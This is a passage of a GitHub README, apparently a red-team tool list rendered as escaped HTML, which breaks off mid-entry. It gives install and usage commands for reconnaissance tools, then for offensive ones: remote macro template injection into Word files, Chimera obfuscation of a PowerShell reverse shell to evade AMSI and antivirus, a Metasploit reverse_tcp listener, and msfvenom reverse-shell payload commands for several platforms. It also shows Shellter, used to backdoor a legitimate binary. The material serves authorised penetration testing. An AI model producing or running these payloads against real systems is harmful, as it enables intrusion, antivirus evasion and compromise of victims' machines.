dir=\"auto\"\u003eThe findings will be presented through a web interface for easy browsing and analysis.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003eGitrob will need a Github access token in order to interact with the Github API. \u003ca href=\"https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/\"\u003eCreate a personal access token\u003c/a\u003e and save it in an environment variable in your .bashrc or similar shell configuration file:\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef\"\u003e\u003cpre\u003e\u003cspan class=\"pl-k\"\u003eexport\u003c/span\u003e GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Go)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go get github.com/michenriksen/gitrob\"\u003e\u003cpre\u003ego get github.com/michenriksen/gitrob\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eA \u003ca href=\"https://github.com/michenriksen/gitrob/releases\"\u003eprecompiled version\u003c/a\u003e is available for each release.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run against org\ngitrob {org_name}\n\n# Saving session to a file\ngitrob -save ~/gitrob-session.json acmecorp\n\n# Loading session from a file\ngitrob -load ~/gitrob-session.json\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run against org\u003c/span\u003e\ngitrob {org_name}\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Saving session to a file\u003c/span\u003e\ngitrob -save \u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/gitrob-session.json acmecorp\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Loading session from a file\u003c/span\u003e\ngitrob -load \u003cspan class=\"pl-k\"\u003e~\u003c/span\u003e/gitrob-session.json\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.uedbox.com/post/58828/\" rel=\"nofollow\"\u003ehttps://www.uedbox.com/post/58828/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/sensepost/gowitness\"\u003egowitness\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-gowitness\" class=\"anchor\" aria-label=\"Permalink: 🔙gowitness\" href=\"#gowitness\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Go)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go install github.com/sensepost/gowitness@latest\"\u003e\u003cpre\u003ego install github.com/sensepost/gowitness@latest\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull installation information can be found \u003ca href=\"https://github.com/sensepost/gowitness/wiki/Installation\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Screenshot a single website\ngowitness single https://www.google.com/\n\n# Screenshot a cidr using 20 threads\ngowitness scan --cidr 192.168.0.0/24 --threads 20\n\n# Screenshot open http services from an namp file\ngowitness nmap -f nmap.xml --open --service-contains http\n\n# Run the report server\ngowitness report serve\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Screenshot a single website\u003c/span\u003e\ngowitness single https://www.google.com/\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Screenshot a cidr using 20 threads\u003c/span\u003e\ngowitness scan --cidr 192.168.0.0/24 --threads 20\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Screenshot open http services from an namp file\u003c/span\u003e\ngowitness nmap -f nmap.xml --open --service-contains http\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run the report server\u003c/span\u003e\ngowitness report serve\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/sensepost/gowitness/wiki/Usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/sensepost/gowitness\"\u003ehttps://github.com/sensepost/gowitness\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eResource Development\u003c/h1\u003e\u003ca id=\"user-content-resource-development\" class=\"anchor\" aria-label=\"Permalink: Resource Development\" href=\"#resource-development\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/JohnWoodman/remoteinjector\"\u003eremoteInjector\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-remoteinjector\" class=\"anchor\" aria-label=\"Permalink: 🔙remoteInjector\" href=\"#remoteinjector\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eInjects link to remote word template into word document.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis Python-based utility modifies a .docx file’s settings.xml.rels link to a remote hosted .dotm template containing a VBA macro, executing when the document is opened and macros are enabled.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://john-woodman.com/research/vba-macro-remote-template-injection/\" rel=\"nofollow\"\u003eRelated Blog Post\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector\"\u003e\u003cpre\u003egit clone https://github.com/JohnWoodman/remoteinjector\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e remoteinjector\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 remoteinjector.py -w https://example.com/template.dotm example.docx\"\u003e\u003cpre\u003epython3 remoteinjector.py -w https://example.com/template.dotm example.docx\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/tokyoneon/Chimera\"\u003eChimera\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-chimera\" class=\"anchor\" aria-label=\"Permalink: 🔙Chimera\" href=\"#chimera\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eChimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt-get update \u0026amp;\u0026amp; sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git\nsudo git clone https://github.com/tokyoneon/chimera /opt/chimera\nsudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/\nsudo chmod +x chimera.sh; ./chimera.sh --help\"\u003e\u003cpre\u003esudo apt-get update \u003cspan class=\"pl-k\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git\nsudo git clone https://github.com/tokyoneon/chimera /opt/chimera\nsudo chown \u003cspan class=\"pl-smi\"\u003e$USER\u003c/span\u003e:\u003cspan class=\"pl-smi\"\u003e$USER\u003c/span\u003e -R /opt/chimera/\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e /opt/chimera/\nsudo chmod +x chimera.sh\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e ./chimera.sh --help\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\\\ncopyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\\\ninvoke-expression,out-string,write-error -j -g -k -r -p\"\u003e\u003cpre\u003e./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\\\ncopyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\\\ninvoke-expression,out-string,write-error -j -g -k -r -p\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.offensive-security.com/metasploit-unleashed/Msfvenom/\" rel=\"nofollow\"\u003emsfvenom\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-msfvenom\" class=\"anchor\" aria-label=\"Permalink: 🔙msfvenom\" href=\"#msfvenom\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eMsfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSet Up Listener\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"use exploit/multi/handler \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST your-ip \nset LPORT listening-port \nrun\"\u003e\u003cpre\u003euse exploit/multi/handler \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e PAYLOAD windows/meterpreter/reverse_tcp \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e LHOST your-ip \n\u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e LPORT listening-port \nrun\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch4 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eMsfvenom Commands\u003c/h4\u003e\u003ca id=\"user-content-msfvenom-commands\" class=\"anchor\" aria-label=\"Permalink: Msfvenom Commands\" href=\"#msfvenom-commands\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003ePHP:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R\"\u003e\u003cpre\u003emsfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eWindows:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p windows/shell/reverse_tcp LHOST=\u0026lt;IP\u0026gt; LPORT=\u0026lt;PORT\u0026gt; -f exe \u0026gt; shell-x86.exe\"\u003e\u003cpre\u003emsfvenom -p windows/shell/reverse_tcp LHOST=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e LPORT=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ePORT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -f exe \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell-x86.exe\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLinux:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p linux/x86/shell/reverse_tcp LHOST=\u0026lt;IP\u0026gt; LPORT=\u0026lt;PORT\u0026gt; -f elf \u0026gt; shell-x86.elf\"\u003e\u003cpre\u003emsfvenom -p linux/x86/shell/reverse_tcp LHOST=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e LPORT=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ePORT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -f elf \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell-x86.elf\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eJava:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p java/jsp_shell_reverse_tcp LHOST=\u0026lt;IP\u0026gt; LPORT=\u0026lt;PORT\u0026gt; -f raw \u0026gt; shell.jsp\"\u003e\u003cpre\u003emsfvenom -p java/jsp_shell_reverse_tcp LHOST=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eIP\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e LPORT=\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003ePORT\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -f raw \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell.jsp\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eHTA:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh \u0026gt; shell.hta\"\u003e\u003cpre\u003emsfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e shell.hta\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.shellterproject.com/\" rel=\"nofollow\"\u003eShellter\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-shellter\" class=\"anchor\" aria-label=\"Permalink: 🔙Shellter\" href=\"#shellter\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eShellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eShellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull README information can be found \u003ca href=\"https://www.shellterproject.com/Downloads/Shellter/Readme.txt\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Kali)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"apt-get update\napt-get install shellter\"\u003e\u003cpre\u003eapt-get update\napt-get install shellter\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eVisit the \u003ca href=\"https://www.shellterproject.com/download/\" rel=\"nofollow\"\u003edownload page\u003c/a\u003e and install.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eJust pick a legit binary to backdoor and run Shellter.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome nice tips can be found \u003ca href=\"https://www.shellterproject.com/tipstricks/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLots of community usage demos can be found \u003ca href=\"https://www.shellterproject.com/shellter-community-demos/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.kali.org/tools/shellter/images/shellter.png\" rel=\"nofollow\"\u003ehttps://www.kali.org/tools/shellter/images/shellter.png\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/optiv/Freeze\"\u003eFreeze\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-freeze\" class=\"anchor\" aria-label=\"Permalink: 🔙Freeze\" href=\"#freeze\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 